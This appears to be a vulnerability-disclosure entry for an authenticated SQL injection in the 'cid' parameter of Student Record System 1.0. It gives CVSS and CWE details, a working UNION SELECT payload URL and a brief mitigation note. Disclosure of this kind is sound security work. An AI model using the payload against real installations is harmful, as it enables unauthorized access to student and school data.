vendor:
Student Record System
by:
Mohd. Anees
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Student Record System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:phpgurukul:student_record_system:1.0
Platforms Tested: Windows 10 Xammp, Kali Linux
2022
Student Record System 1.0 – ‘cid’ SQLi (Authenticated)
Authenticate and edit course section where cid parameter will appear and put your payload at there it'll work. An example of the payload is http://localhost/schoolmanagement/schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.